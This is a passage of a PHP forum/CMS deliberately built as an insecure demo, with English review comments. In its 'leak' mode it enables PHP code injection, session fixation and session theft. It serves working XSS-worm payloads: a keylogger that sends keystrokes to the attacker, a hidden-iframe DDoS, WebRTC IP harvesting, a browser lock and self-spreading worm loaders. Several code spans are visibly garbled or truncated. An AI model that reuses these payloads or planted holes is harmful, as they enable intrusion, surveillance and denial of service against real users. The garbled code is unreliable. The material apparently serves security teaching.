"'),
'file' => array('/^(\d+)-(.+)$/e' => '($creolevar = array_merge($creolevar,(($x = $sql["aq"]($conn,"select f.id as upid, '
.'strftime(\"%s\",f.[create]) as uptime, f.status/2%2 as upstatus, f.status%2 as upright, u.username as upuser, '
.'f.name as upname, f.info as upinfo, abs(f.size) as upsize, f.hash as uphash, f.type as uptype from [file] as f '
.'left join [user] as u on u.id = f.user where f.user = $1 and f.name like \'$2\' and f.status is not null",SQLITE_ASSOC))
? reset($x) : array()))) ? "" : ""'),
'hide' => array('/^([^|_\n]*)(\||_)?\s*(.+)$/es' => '\'
Sichheitslücken wurden ";
# Toggle for the 'leak' cookie; the surrounding message is assembled in $out.
# - Cookie present with a falsy value: it is expired (expiry time in the past), so the configured
#   $leak value applies again on the next request.
# - Otherwise: a session cookie leak=0 is set and "de" is appended, so the text ends in
#   "deaktiviert!" (deactivated) instead of "aktiviert!" (activated).
# setcookie() is called with four arguments only, so no Secure/HttpOnly flag is set here.
if(isset($_COOKIE['leak']) and !$_COOKIE['leak'])
setcookie('leak',1,time()-$ctl,$self);
else {
setcookie('leak',0,0,$self);
$out .= "de";
}
$out .= "aktiviert!
";
}
# The client cookie can only switch the insecure mode off: a falsy 'leak' cookie forces $leak to
# false, a truthy one keeps whatever $leak was configured to before this point.
if(isset($_COOKIE['leak']))
$leak = ($_COOKIE['leak']) ? $leak : false;
# Full insecure mode ($leak = 1) applies when $leak is already exactly 1, or when $leak is truthy and
# the client address is loopback (127.x.x.x, "localhost", ::1) or equals the server's own address.
# `and` binds tighter than `or`, so the test reads: $leak === 1 or ($leak and (loopback or same address)).
# NOTE(review): REMOTE_ADDR is the directly connected peer. Behind a reverse proxy on the same host
# every request would pass the locality test -- confirm how this is deployed.
if($leak === 1 or $leak and (preg_match('/^(127(\.\d+){3}|localhost|::1)$/i',$_SERVER['REMOTE_ADDR'])
or isset($_SERVER['SERVER_ADDR']) and $_SERVER['SERVER_ADDR'] == $_SERVER['REMOTE_ADDR'])) { // enable PHP code injection
$leak = 1;
# Rewrites only the key (the regex) of the first $creole rule: every "89" becomes \d and every "$" is
# removed; the rule's replacement and all other rules are kept in their original order.
# Per the original comment this is what switches the PHP code injection demo on.
$creole = array_merge(array(str_replace(array(89,'$'),array('\d',''),key(array_slice($creole,0,1))) => current(array_slice($creole,0,1))),array_slice($creole,1));
$info[0] = ", [[^Creole]]-Formatierung";
}
# $leak is truthy but the request is not local: only show the notice (German) that PHP code injection
# is disabled in the source and should be enabled and tested only inside an isolated local network.
elseif($leak)
$info[1] = "//PHP-[[::W/)Code_injection|+]] wurde aus Sicherheitsgründen im [[::w/)Quelltext]] deaktiviert. Und sollte nur im abgeschotteten [[::w/Local_Area_Network|Lokalen Netzwerk]] aktiviert und getestet werden!//\n";
}
# Insecure ("leak") mode bookkeeping: optional target override plus the warning texts shown to users.
if($leak) {
# A 'to' cookie that starts with http:// or https:// replaces $attack['_jsleak_'].
# The matched value is wrapped in single quotes without escaping, and \S+ does not exclude quote
# characters, so the cookie content is trusted verbatim here.
if(isset($_COOKIE['to']) and preg_match('!^https?://\S+!',$_COOKIE['to'],$var))
$attack['_jsleak_'] = "'$var[0]'";
# Notice (German): all data is stored in plain text and can be read out by the demo attack codes.
$info[2] = "**Alle Daten werden in Klartext gespeichert und können durch ??ak?? ausgelesen werden!**\n";
$info[7] = " (//Nur im [[^Leak^Sicherheitslücken ein/aus Schalten^|Sicherheitsmodus]]//)";
# Shown only while the target is not an absolute http(s) URL: the notice says the attack codes use
# relative or local paths so that the data never really leaves the site.
if(!preg_match('!^[\'"]?https?://!',$attack['_jsleak_']))
$info[5] = "Aus Sicherheitsgründen sind die ??ak?? mit relativen bzw. lokalen [[::w/)Pfad(name]]en entwickelt worden, so dass die Daten das ??if?? nie wirklich verlassen. //(Mit dem Nachteil, dass viele [[::w/Sicherheitssoftware|Security-Systeme]] die ??ak?? als ungefährlich einstufen.)//";
}
# Secure mode: remove the CREATE TABLE statements for [worm] and [xss] from $sql[0]
# (presumably the schema script -- confirm where $sql[0] is defined).
else
$sql[0] = preg_replace('/CREATE TABLE\s*\[(worm|xss)\][^;]+;/s','',$sql[0]);
# "Externen" Angriffs-Code (JavaScript) zurückgeben
$attack['_worm_'] = "";
if($leak and preg_match('/^(worm(line|test|y?)|(bnps))(?:\.(js|txt))?$/i',$request,$var)) { // Tiny-Profil-Wurm
$code = false;
$val = strtolower($var[1]);
if(substr($val,0,4) == 'worm') {
if($var[2] == 'test' and isset($worm))
$code = $worm;
elseif($var[2] == 'line')
$code = $attack['_worm_'];
elseif($var[2] == 'y')
$code = "Wormy was here!".((isset($query) and $query != '' and preg_match('!^https?://!',$query))
? "\n" : '')."";
elseif($var[2] == '')
$code = "";
}
elseif($val == 'bnps') // Angriffs-Presets für den Control-Center
$code = strtr(<< 1) {
top.location.reload();
'Reloaded'
}",
"!Remove Bot", // Selbst Zerstörung (Profil bleibt erhalten)
"X([M[6],'profil=' + Y(X([M[6]]).match(/[<](textarea).*?>([^\\0]*?)\s+(&(amp;)?lt;|<)script\s(id|title)=[^\\0]+?<\/\\1>/)[2])]);
'Removed'",
"!Sleep Bot", // Bot deaktivieren
"if(J > 1) {
W = -1;
'Sleeping...'
}",
"Chat: Decrypt-Text", // Verschlüsselte Chat-Nachricht entschlüsseln (Nur beim Sender/Empfänger möglich)
"top.CryptoJS.AES.decrypt('##var##'.replace(/^\w+\//,''),top.window.name.replace(/^key:[\w,]+,(?=\w+$)/,'')).toString(top.CryptoJS.enc.Utf8);",
"Chat: Get Keys", // Secret, Public und Script-Keys anzeigen
"a = top.F, b = top.window.name.replace(/^key:/,'').split(',');
(a ? 'n=' + a[2] + '%0ag=' + a[1] + '%0ap=' + a[0] + '%0a' : '') + 'a=' + b[0] + '%0aA=' + b[1] + '%0aK=' + b[2] + '%0a'",
"Debug-Infos", // Alle Bot-Variabeln zurückgeben
"M.join('%0a') + '%0a***%0a' + O.join('%0a') + '%0a***%0a' + [J,S,W].join('%0a')",
"DDoS-Attack,$attack[_xlink_]", // Eine Webseite unter Dauerbeschuss setzen
"a = ['##var##','DDoS-Attack','name','DoS','id','DoS','style','display:none'],
b = top.document.createElement('iframe');
for(c=2;c
');
'Open Fire'",
"DDoS-STOP", // Waffenruhe
"if((a = top.document.getElementById('DoS')))
a.parentNode.removeChild(a);
'Peace'",
"Fenster-Titel,Hello World!", // Fenster-Titel ändern
"top.document.getElementsByClassName('title')[0].innerHTML = '##var##'",
"Hacked-Info,Y0u h4v3 b33n H4ck3d!", // Nachricht an den User schicken
"while(confirm('##var##'));
'Confirm'",
"Home-Profil,/Profil", // Das Benutzer-Profil aufrufen
"if(J > 1)
top.location.href = M[5] + '##var##'",
"Keylogger (Bugy)", // Alle Tasten loggen und alle 10 Sekunden zum Hacker schicken
"var a,K = '';
top.document.onkeypress = function(e) {
a = window.event ? event : e;
K += String.fromCharCode(a.keyCode ? a.keyCode : a.charCode);
};
window.setInterval(function() {
if(K != '')
X([M[7],'chat=call:0,' + Y(K)]);
K = '';
},10000);
'Keys logging'",
"Lock Browser,##pass##", // Browserfenster mit Kennwort sichern
"a = top.document.createElement('div');
a.setAttribute('style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);');
top.document.body.appendChild(a);
b = 1;
while(prompt('Enter Password!') != '##var##')
b++;
a.parentNode.removeChild(a);
b + ' try(s)'",
"Place Kitten,$attack[_clink_]", // Alle Standart-Grafiken durch Katzenbilder ersetzen
"for(d=0;dX
';
top.document.body.appendChild(a);
'Poping up'",
"Rick Rolling,640 480 $attack[_ylink_]",// Musikvideo abspielen
"a = top.document.createElement('div');
b = ['style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);',
'ondblclick','this.parentNode.removeChild(this);','id','ricknroll'];
for(c=0;c';
top.document.body.appendChild(a);
'Rick\'n\'Roll'",
"Rick Killing", // Musikvideo entfernen
"if((a = top.document.getElementById('ricknroll'))) {
a.parentNode.removeChild(a);
'Rick killed'
}",
"WebRTC-IPs,2000", // Lokale/Externe IP-Adresse des Bots ausgeben
"a = top.document.createElement('iframe');
a.setAttribute('id','iframe');
a.setAttribute('style','display:none');
a.setAttribute('sandbox','allow-same-origin');
top.document.body.appendChild(a);
function Q(a) {
if((a = /(\d{1,3}(\.\d{1,3}){3}|[a-f\d]{1,4}(:[a-f\d]{1,4}){7})/.exec(a)[1]) && c.indexOf(a) < 0)
c += ',%20' + a;
}
try {
b = !!window.webkitRTCPeerConnection,
c = '',
e = {iceServers: [{urls: 'stun:stun.services.mozilla.com'}]};
if(!(a = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)) {
d = iframe.contentWindow;
a = d.RTCPeerConnection || d.mozRTCPeerConnection || d.webkitRTCPeerConnection;
b = !!d.webkitRTCPeerConnection;
}
d = {optional: [{RtpDataChannels: true}]};
b = new a(e,d);
b.onicecandidate = function(a) {
if(a.candidate)
Q(a.candidate.candidate);
};
b.createDataChannel('');
b.createOffer(function(a) {
b.setLocalDescription(a, function(){}, function(){});
}, function(){});
} catch(e){};
setTimeout(function() {
try {
a = b.localDescription.sdp.split('%0a');
a.forEach(function(b) {
if(b.indexOf('a=candidate:') === 0)
Q(b);
});
} catch(e){};
if(c != '') {
X([M[7],'chat=call:0,' + c.substr(4)]);
(a = top.document.getElementById('iframe')).parentNode.removeChild(a);
}
},##var##);0",
"Worm-Loader [Install]", // XSS-BotWurm außerhalbs des Profils laden
"a = '';
for(b=0;b<80;b++)
a += '%09';
if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2] + unescape(a) + '']);
b[2];
}",
"Worm-Loader [Remove]", // XSS-BotWurm Loader deinstallieren
"if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2]]);
b[2];
}",
"Worm-Loader [Cookie]", // XSS-BotWurm-Loader im Cookie verstecken
"document.cookie='username=' + encodeURI(unescape('%22> ($a = explode(' ',$attack['_wordlist_'])) ? $a[rand(0,count($a)-1)] : ''));
if(!$code)
$code = 'Malware not found ;-)';
$code = (isset($var[4]) and $var[4] == "txt" or !isset($var[4]) and preg_match('/[A-Z]/',substr($var[0],0,1))) ? array('plain',trim($code))
: array('javascript',((substr($val,0,4) == 'worm') ? "// Malware mit installieren!\ndocument.write(\""
.strtr(preg_replace($js,'',$code),array('\\' => '\\\\', '"' => '\\"')).'");' : strtr(preg_replace($js,'',$code),array('\\' => '\\\\'))));
header("Content-Type: text/$code[0]; charset=8859-1");
die($code[1]);
}
# Persist all cookies (1 year according to the original comment; the default lifetime is $ctl).
# Request 'Cookie' re-issues every cookie the client sent, except the session cookie, with a new
# expiry time. ?time=<seconds> overrides the lifetime: the first run of digits is used and no upper
# bound is applied.
# setcookie() is called with four arguments, so the re-issued cookies carry no Secure/HttpOnly flag.
if($request == 'Cookie') {
$a = 0; // number of cookies re-issued
// $val is used as the preg_match() result first and then overwritten with the absolute expiry time
$val = time() + ((isset($_GET['time']) and preg_match('/\d+/',$_GET['time'],$val)) ? $val[0] : $ctl);
foreach($_COOKIE as $key => $var)
if(!preg_match('/^('.preg_quote(session_name()).')$/',$key)) {
$a++;
setcookie($key,$var,$val,$self);
}
// the confirmation (German: "cookies are stored until <date>") replaces $out if anything was re-issued
if($a)
$out = "
Cookies werden bis zum ".date('d.m.Y H:i:s',$val)." gespeichert!
";
}
# Require PHP >= 4.3 and < 7.0.
# The leading "major.minor" of phpversion() is parsed; a version below 4.3 or with major >= 7 adds the
# message (German: PHP 4.3 to 5.6 required, PHP 5.3 with the SQLite2 add-on recommended), forces the
# 'Impressum' page and disables all database use by setting $sql to false.
# Context: other code in this file relies on the preg_replace /e modifier, which PHP 7.0 removed.
# Every release in the accepted range is past end of life and receives no security fixes.
if(preg_match('/^(\d+)\.(\d+)/',phpversion(),$var) and ($var[1] < 4 or $var[1] == 4 and $var[2] < 3 or $var[1] >= 7)) {
$out .= "
PHP von 4.3 bis 5.6 wird vorausgesetzt!
Empfohlen wird PHP 5.3 mit SQLite2 Addon!
";
$request = 'Impressum';
$sql = false;
}
# SQLite vorbereiten, testen und bei Fehler neue Datenbank anlegen
elseif($sql) {
# Build the function table in $sql: for every whitespace-separated word in $sql[1] the key is the
# word's upper-case letters in lower case, and the value is 'sqlite_' plus the lower-cased word.
# Existing keys are not overwritten. The keys used in this file ('o', 'aq', 'sq', 'e', 'es', 'c') are
# presumably produced here -- the content of $sql[1] is defined outside this view.
foreach(preg_split('/\s+/',$sql[1]) as $val)
if(!isset($sql[$key = strtolower(preg_replace('/[^A-Z]+/','',$val))]))
$sql[$key] = 'sqlite_'.strtolower($val);
# No usable SQLite2 extension: the function named by $sql['o'] is missing or SQLITE_BOTH is undefined.
if(!function_exists($sql['o']) or !defined('SQLITE_BOTH')) {
$sql = false;
if(defined('SQLITE3_BOTH')) {
$var = "Das SQLite3-Addon";
# Look for a sibling script whose name is this file's base name with "*3" inserted before the
# extension and redirect to the first match with a 303.
if($val = glob(preg_replace('/(?=\.\w+$)/','*3',basename(__FILE__))) and count($val)) {
header("Location: ".preg_replace('/\/[^\/]*?$/','',$self)."/$val[0]");
header('HTTP/1.0 303 See Other');
$sql = 0;
}
}
else
$var = "Die PHP-Erweiterung SQLite";
# NOTE(review): $var is not used by the string below as shown, so the message text appears to be
# lost in this copy; the final assignment also overwrites the 0 stored in the redirect branch.
$out = "
";
$sql = false;
}
else {
# Set variables from the database.
# Resolve the profile/blog owner: when $mid is not set and the path ends in /Blog/<name> or
# /Profil/<name>, look the user id up by name.
# <name> is limited to [\w.-] by the pattern, so no quote character can reach the SQL text;
# "_" is still a LIKE wildcard, so the lookup is not an exact match.
if(!$mid and $path and preg_match('!/?(Blog|Profil)/([\w.-]+)$!i',$path,$var)) {
$mid = $sql['sq']($conn,"select id from [user] where username like '$var[2]'");
if($request == 'Blog')
$getopt[] = "id=$mid";
}
# $lone holds the number of user rows. With an empty table the notice (German: the first user of the
# forum automatically receives admin rights) is set, $user becomes true and the start page or
# 'Mitglieder' is replaced by the registration page 'Anmelden'.
# Until that first account exists, whoever registers first becomes administrator.
if(!$lone = $sql['sq']($conn,"select count(*) from [user]")) {
$info[3] = "**Der [[^Anmelden|erste Benutzer]] des Forums bekommt automatisch Admin-Rechte!**\r\n";
$user = true;
if(!$request and !$query or $request == 'Mitglieder')
$request = 'Anmelden';
}
# More than one user: $lone is reset to false, so it stays truthy only for exactly one user.
elseif($lone > 1)
$lone = false;
$getopt = (isset($getopt)) ? implode("&",$getopt) : ''; // search options as a URL query string
# Output the sitemap.
# Served only when $craw is truthy and the request is 'sitemap.xml'. One query collects three kinds
# of entries: CMS pages (status/8%2 = 1, status/2%4 = 0, content containing a line break), user
# profiles of accounts with a status and a profile, and blog posts (userid = mailid, status%2 = 0).
# No request data is interpolated into this SQL text.
# NOTE(review): the XML element markup of the output strings appears to be missing in this copy, and
# name/date are inserted without XML escaping in what is visible -- verify against the original file.
if($craw and $request == 'sitemap.xml' and $array = $sql['aq']($conn,"
select name, -- CMS
strftime('%Y-%m-%d',change) as date
from [cms]
where status/8%2 = 1 and status/2%4 = 0 and content like '%\n%'
union
select 'Profil/'||username as name, -- User-Profil
strftime('%Y-%m-%d',change) as date
from [user]
where status is not null and profil is not null
union
select 'Blog/'||u.username||'?q='||f.id as name, -- User-Blog
strftime('%Y-%m-%d',f.change) as date
from [forum] as f
left join [user] as u on u.id = f.userid
where f.userid = f.mailid and f.status%2 = 0 and u.status is not null
order by date desc",SQLITE_ASSOC)) {
foreach($array as $key => $var)
$array[$key] = "$Self/$var[name]$var[date]";
header('Content-Type: text/xml');
die("\n"
."\n".implode("\n",$array)."\n");
}
# Return per-user data for Ajax callers. Both endpoints answer before any session or login check.
#
# ?salt=<username or mail>: answers "username:salt". The stored password value is expected in the form
# "salt:<salt>-hash:<hash>" (see the pattern applied to the query result); the hash part is not returned.
# Only the first run of [@\w.-] characters of the parameter reaches the SQL text, so no quote can be
# injected; "_" remains a LIKE wildcard. The endpoint tells existing accounts from unknown ones and
# discloses the salt to anyone who asks, so it should be rate limited where enumeration matters.
if(isset($_GET['salt']) and preg_match('/[@\w.-]+/',$_GET['salt'],$var)) // Salt
die((preg_match('/^([\w.-]+),salt:(\w+)-hash:\w+$/',$sql['sq']($conn,"select username||','||password from [user] where username like '$var[0]' or mail like '$var[0]'"),$val)) ? "$val[1]:$val[2]" : false);
# ?ask=<username>[:<mail>]: answers the password-help entry as "<n>-<text>". A non-zero <n> is
# resolved through $pass (presumably the preset questions -- defined outside this view), otherwise the
# stored custom text is returned.
# Outside leak mode the mail address has to match as well; in leak mode the username alone is enough.
elseif(isset($_GET['ask']) and preg_match('/([@\w.-]+)(?::([\w@.-]+))?/',$_GET['ask'],$var)) // ask
die((preg_match('/^(\d+)-(?:(.+?):)?/',$sql['sq']($conn,"select passhelp from [user] where username like '$var[1]'".(($leak) ? "" : " and mail like '".((isset($var[2])) ? $var[2] : '')."'")),$val)) ? (($val[1]) ? "$val[1]-{$pass[$val[1]]}" : "$val[1]-$val[2]") : false);
# Alternative hash login (no form POST involved).
# A token "<id>.<hash>" is accepted from ?id= or, failing that, from an "id=" parameter inside the
# Referer header. It is valid when $hash[0]("username:password") for that user id equals the hash part.
# Security notes:
# - the token is derived only from the user name and the stored password value, so it does not expire
#   and stays valid until that value changes;
# - it travels in URLs and Referer headers, which end up in server logs, browser history and on
#   third-party sites that are linked from a page carrying it;
# - the comparison uses ==, which is neither type-strict nor constant-time; hash_equals() is the
#   usual replacement but needs PHP 5.6 or later.
# On success $status is set to 1, $uid to the user id and $row to the complete token.
if(count($_POST) == 0 and (isset($_GET['id']) and preg_match('/^(\d+)\.(\w+)$/',$_GET['id'],$var)
or isset($_SERVER['HTTP_REFERER']) and preg_match('/id=(\d+)\.(\w+)/',$_SERVER['HTTP_REFERER'],$var))
and $row = $sql['sq']($conn,"select username||':'||password from [user] where status is not null and id=$var[1]") and $hash[0]($row) == $var[2]) {
$status = 1;
$uid = $var[1];
$row = $var[0];
}
# Feeds ausgeben
if($request == 'Atom' and ($inet or !$inet and $uid)) {
if($id and $uid and $row)
$uid = $id;
$array = $sql['aq']($conn,"
select f.id as id,
f.id as name,
f.[create] as 'create',
f.[create] as change,
path,
ifnull(title,'Ohne Titel') as title,
mailid,
message,
ifnull(f.status%2,'-1') as right,
ifnull(u.username,'Unbekannt') as author,
ifnull(m.username,'Unbekannt') as tomail
from [forum] as f
left join user as u on u.id = f.userid
left join user as m on m.id = f.mailid
where f.status is not null and ".(($mid) ? "f.mailid = f.userid and f.userid = $mid".(($uid) ? "" : " and f.status%2 = 0")
: (($uid) ? "(f.mailid is null or f.mailid = $id or f.mailid is not null and f.userid = $id)"
.((isset($_GET['latest']) and $var = $sql['sq']($conn,"select change from [user] where id=$id"))
? " and (f.[create] > datetime('$var') or f.mailid = $id and f.status/2%2 = 0)" : "")
: "f.mailid is null and f.status%2 = 0")."
union all
select id,
name,
[create] as 'create',
change,
null as path,
ifnull(description,'Ohne Titel') as title,
null as mailid,
content as message,
ifnull(status/2%4,'-1') as right,
(select username from user where status/2%2 order by id limit 1) as author,
'Unbekannt' as tomail
from [cms]
where status/8%2 = 1 and status/2%4 < ".(($uid) ? 3 : 1))."
order by 4 desc
limit ".max(min(((isset($_GET['max']) and preg_match('/\d+/',$_GET['max'],$var)) ? $var[0] : $paging[1]),$paging[2]),$paging[0]),SQLITE_ASSOC);
foreach($array as $key => $var) {
$creolevar = array_merge($creolevar,array('type' => 'feed', 'id' => $var['id'], 'name' => $var['name'], 'title' => $var['title'], 'from' => $var['author'], 'right' => $var['right'], 'create' => strtotime($var['create']), 'change' => strtotime($var['change'])));
$array[$key] = "".strtr($var['title'],$html)."
" : '')
.preg_replace(array_keys($creole),str_replace($self,$Self,array_values($creole)),strtr(preg_replace('/::f\/[\w()!,.-]+/',"\$0&id=$row",$var['message']),array_slice($html,1)))."]]>$var[id].".strtotime($var['create'])."".date("Y-m-d\TH:i:s",strtotime($var['change'])).preg_replace('/([+-][\d]{2})([\d]{2})/','$1:$2',date("O",strtotime($var['change'])))."".strtr($var['author'],$html)."$Self/Profil/".strtr($var['author'],$html)."".(($var['mailid'] and $var['author'] != $var['tomail']) ? "
".strtr($var['tomail'],$html)."$Self/Profil/".strtr($var['tomail'],$html)."" : "")."\n\n";
}
$cleanup = array_merge($creoleph['toutf'],array('/[\x00-\x1f]+/' => ''));
header('content-type: text/xml; charset=UTF-8');
die("
$title".preg_replace('/^.+?([^<]+).*$/s','$1',reset($array))."PHP/".phpversion()."$logo\n".preg_replace(array_keys($cleanup),array_values($cleanup),implode('',$array))."\n");
}
# Start the session.
# In leak mode the session id is taken from the query string when present. This is the classic
# session fixation pattern: an id chosen by someone else is adopted as it is. Outside leak mode the
# id supplied by PHP's own session handling is used.
if($leak and isset($_GET[session_name()]))
session_id($_GET[session_name()]);
// @ suppresses any warning from session_start() (for example when headers were already sent)
@session_start();
# An established session provides $uid; the user's status is reloaded from the database on every request.
if(isset($_SESSION['uid']) and $_SESSION['uid']) {
$uid = $_SESSION['uid'];
$status = $sql['sq']($conn,"select status from [user] where id=$uid");
}
# Anonymous session: count the requests in $_SESSION['src']; the counter restarts at 0 when a
# 'login' cookie is present or when it did not exist yet.
else
$_SESSION['src'] = (!isset($_COOKIE['login']) and isset($_SESSION['src'])) ? $_SESSION['src'] + 1 : 0;
# Manipulate session data (leak mode only).
# Request 'set' with a query that matches the pattern built from $dpsk writes $var[2] to the session
# key $var[1], or removes the key when the value is empty or "0". That includes 'uid', the key the
# login state above is read from.
# NOTE(review): $dpsk is defined outside this view; which key names it admits cannot be told from here.
if($leak and $request == 'set' and preg_match(substr($dpsk,0,-2).'=([\w\s:-]*)$/',urldecode($query),$var))
if($var[2])
$_SESSION[$var[1]] = $var[2];
else
unset($_SESSION[$var[1]]);
# Cookie login ("remember me").
# The 'login' cookie has the form "<id>.<hash>" and is accepted when $hash[0]("username:password") for
# that user id equals the hash part. As with the hash login, the token is derived only from the user
# name and the stored password value, so a copied cookie stays usable until that value changes, and
# the comparison uses == rather than a constant-time check.
# No session_regenerate_id() call is visible when the session is bound to the user below.
if(isset($_COOKIE['login']) and preg_match('/^(\d+)\.(\w+)$/',$_COOKIE['login'],$var) and $val = $sql['aq']($conn,"
select username||':'||password as hash,status,change from [user] where status is not null and id = $var[1]") and $hash[0]($val[0]['hash']) == $var[2]) {
# $row carries SQL fragments for the login-confirmation UPDATE that follows later in the script:
# 'set' raises the logged-in bit, 'where' limits the update to accounts that are logged out or
# whose last change is older than $eos minutes.
$row = array('set' => "status=(status/2%8*2+1),", 'where' => "(status%2 = 0 or datetime(change,'+$eos minutes') < datetime('now','localtime')) and ");
$uid = $var[1];
if(!isset($_SESSION['uid'])) {
$_SESSION['uid'] = $uid;
$_SESSION['lua'] = $val[0]['change'];
// refresh the cookie lifetime; four arguments only, so no Secure/HttpOnly flag
setcookie('login',"$uid.".$hash[0]($val[0]['hash']),time()+$ctl,$self);
}
// keep the higher status bits and set bit 0 (logged in)
$status = floor($val[0]['status']/2)*2+1;
}
# Is the uid in the database and logged in? Otherwise log the user out automatically.
# The session is accepted when the user row has bit 0 of status set and, outside leak mode, the
# stored user agent equals the current User-Agent header. The header is attacker-controlled, so this
# binding only hinders casual reuse of a copied session id; leak mode removes it entirely.
if($uid and isset($_SESSION['uid'])) {
if($sql['sq']($conn,"
select id
from [user]
where id=$uid".(($leak) ? "" /* allow session theft */ : "
and useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'")."
and status%2=1") == $uid) {
# Valid: refresh the activity timestamp, count the request and load the user name.
$sql['e']($conn,"
update [user] set change=datetime('now','localtime'),
requests=requests+1
where id=$uid and status=(status/2%8*2+1)");
$un = $sql['sq']($conn,"select username from [user] where id = $uid");
}
# Invalid: clear the logged-in bit, empty the session array, expire the session cookie and
# continue as a guest.
# NOTE(review): the session cookie is expired with path '/', while the other cookies in this file
# use $self as path -- confirm the session cookie path matches. The server-side session is emptied
# but not destroyed (no session_destroy() call is visible here).
else {
$sql['e']($conn,"
update [user] set status=(status/2%8*2)
where id=$uid");
foreach($_SESSION as $key => $var)
unset($_SESSION[$key]);
setcookie(session_name(),'',time()-$ctl,'/');
$status = 0;
$uid = false;
}
}
# Login confirmation for Atom feeds and cookie login.
# Runs when the database is writable ($rw), a user id is known and $row was set by the hash login
# (a string) or by the cookie login (an array with optional 'set' and 'where' SQL fragments).
# The User-Agent header is escaped through $sql['es'] before it is stored.
# NOTE(review): $addr is placed into the statement without escaping in this block; its origin is
# outside this view -- confirm it is a validated address.
if($rw and $uid and $row)
$sql['e']($conn,"
update [user] set ".((is_array($row) and isset($row['set'])) ? $row['set'] : '')."
logins=logins+1,
requests=requests+1,
change=datetime('now','localtime'),
ip='$addr',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'
where ".((is_array($row) and isset($row['where'])) ? $row['where'] : '')."status is not null and id=$uid");
# File download.
# The query is either "<id>" or "<id>-<name>"; when it matches neither, the profile owner $mid is used
# as user id and the whole query as file name.
# Values reaching the SQL text are cast with (int) or escaped with $sql['es']; $uid appears once as a
# quoted literal ('$uid' != '') that only tests whether somebody is logged in.
# Access rules as written:
# - lookup by id: users without bit 1 of $status (presumably the admin flag -- confirm) only see
#   their own files;
# - lookup by user id and name: any owner's file can be addressed;
# - alias c is joined only for files with status%2 = 1 or for any logged-in user, unless the admin
#   bit is set; a row without c.id is answered with 401, no row at all with 404.
if($request == 'file'
and ( preg_match('/^(\d+)(?:-([\w!,.-]+))?/',$query,$var)
or ($var[1] = $mid) and $var[2] = $query))
if($file = $sql['aq']($conn,"
select c.id as id,
a.name as name,
ifnull(ifnull(a.type,b.type),'application/octet-stream') as type,
ifnull(a.size,b.size) as size,
ifnull(a.data,b.data) as data,
strftime('%s',ifnull(a.[create],b.[create])) as time
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
left join [file] as c on a.id = c.id".(($status/2%2) ? "" : " and (c.status%2 = 1 or c.status%2 = 0 and '$uid' != '')")."
where ".((!@$var[2]) ? (($status/2%2) ? "" : "a.user = ".(int)$uid." and ")."a.id = ".(int)$var[1]
: "a.user = ".@(int)$var[1]." and a.name like '".@$sql['es']($var[2])."'")."
order by a.id desc, a.name
limit 1",SQLITE_ASSOC))
if($file[0]['id']) {
# Conditional GET: the creation time serves as ETag and as Last-Modified. A 304 is sent only when
# both validators match, read either from apache_request_headers() or from $_SERVER.
if($cache) {
$time = $file[0]['time'];
$date = gmdate("D, d M Y H:i:s",$time)." GMT";
header("Cache-Control: public");
header("Etag: $time");
if(($val=(function_exists("apache_request_headers")) ? apache_request_headers() : array())
and isset($val["If-None-Match"]) and isset($val["If-Modified-Since"])
and $val["If-None-Match"] == $time and $val["If-Modified-Since"] == $date
or isset($_SERVER["HTTP_IF_NONE_MATCH"]) and isset($_SERVER["HTTP_IF_MODIFIED_SINCE"])
and $_SERVER["HTTP_IF_NONE_MATCH"] == $time and @$_SERVER["HTTP_IF_MODIFIED_SINCE"] == $date) {
header("HTTP/1.1 304 Not Modified");
exit();
}
header("Pragma: public");
header("Last-Modified: $date");
header("Cache-Control: public, max-age=".($eos*60));
}
# The stored MIME type and file name are sent as they are. The Content-Disposition value has no
# "attachment" disposition type, and no X-Content-Type-Options header is sent here, so an uploaded
# file with an active content type would be rendered in the site's origin.
# NOTE(review): confirm that the upload code restricts type and name, or force a download here.
header("Content-Type: ".$file[0]['type']);
header("Content-Length: ".abs($file[0]['size']));
header('Content-Disposition: filename="'.$file[0]['name'].'"');
// data is stored base64-encoded; a size that is not positive marks a payload that is inflated via $gz['inflate']
die((($var = base64_decode($file[0]['data']) and $file[0]['size'] > 0) ? $var : $gz['inflate']($var)));
}
else {
header('HTTP/1.0 401 Unauthorized');
die("
Datei benötigt Benutzeranmeldung!
");
}
else {
header('HTTP/1.0 404 File Not Found');
die("
Datei nicht gefunden!
");
}
# Disable the forum for external addresses without a login: when none of $inet, $uid and $local is
# truthy, every request is answered with the 'Impressum' page.
# NOTE(review): $inet and $local are set outside this view; presumably they describe whether outside
# access is allowed and whether the client is local -- confirm.
if(!$inet and !$uid and !$local)
$request = 'Impressum';
# Provide and output static or dynamic content.
# $content starts as a map of built-in pages. If it holds an entry for $request, that entry is used;
# otherwise the [cms] table is queried by page name (not when ?nocms is given, unless the request has
# no GET and no POST data at all). A page whose content names another page is resolved through the
# self join r. Visibility is limited by comparing status/2%4 with a level computed from $status.
# NOTE(review): $request is concatenated into the LIKE literal without $sql['es'] in this block; its
# validation, if any, happens outside this view -- confirm it cannot contain a quote character.
if($content = (isset($content[$request])) ? $content = $content[$request] : (($request and !isset($_REQUEST['nocms']) or !count($_GET) and !count($_POST)) ? $sql['aq']($conn,"
select ifnull(r.content,ifnull(c.content,'')) as '.content',
strftime('%s',ifnull(r.change,c.change)) as change,
strftime('%s',ifnull(r.[create],c.[create])) as 'create',
ifnull(r.id,c.id) as id,
ifnull(r.name,c.name) as name,
ifnull(r.description,c.description) as title,
ifnull(ifnull(r.status,c.status)/2%4,'-1') as right,
(select username from user where status/2%2 = 1) as 'from',
'cms' as type
from [cms] as c
left join [cms] as r on r.name like c.content
where c.name like '".preg_replace('/^(Abmelden)$/','',$request)."' and c.status/2%4 <= ".($status/2%2 + $status%2*2),SQLITE_ASSOC) : false)) {
# Database hit: publish Last-Modified, offer the edit link when the page right is 2 or the user has
